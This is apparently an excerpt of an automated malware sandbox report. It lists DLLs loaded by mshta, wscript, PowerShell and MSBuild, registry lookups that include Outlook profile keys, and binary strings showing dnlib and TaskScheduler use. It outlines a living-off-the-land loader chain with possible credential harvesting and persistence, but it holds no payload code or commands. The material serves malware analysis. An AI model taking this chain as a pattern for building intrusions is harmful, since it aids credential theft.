                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2microsoft.win32.taskschedulertasksetsecurityoptionsmicrosoft.win32.taskschedulertaskeventwatcherdnlib.dotnetbyrefsigdnlib.dotnetptrsigdnlib.dotnet.mdrawtyperefrowdnlib.dotnetgenericargumentsdnlib.dotnetimemberdefdnlib.dotnetpropertyattributesdnlib.dotnettypeequalitycomparerdnlib.dotnetconstantuserdnlib.dotnet.mdraweventptrrowdnlib.dotnetimporteroptionsdnlib.dotnetfiledefuserdnlib.dotnet.writerblobheapdnlib.dotnetgenericparamconstraintuserdnlib.dotnetpublickeybasednlib.dotnetmodulesigeventfilterdnlib.dotnetaccesscheckerdnlib.dotnetclasssigdnlib.dotnetmanifestresourceattributesdnlib.threadingicancellationtokendnlib.dotnet.mdrawfieldmarshalrowdnlib.dotnet.mdstorageflagsdnlib.dotnetassemblyrefdnlib.dotneteventdefuserdnlib.dotnetmodulecontextdnlib.dotnetimportresolverdnlib.dotnetiresolutionscopednlib.dotnet.resourcesuserresourcetypednlib.dotnetmethodoverridednlib.dotnet.mdimagecor20headerdnlib.dotnet.writerstartupstubdnlib.dotnetrecursioncountermicrosoft.win32.taskscheduler.fluentbasebuilderdnlib.pervadnlib.threadingenumerableiteratedelegate`1microsoft.win32.taskschedulertaskaccessrulednlib.dotnet.writermetadataeventdnlib.dotnetiistypeormethoddnlib.dotnetmoduledefuserd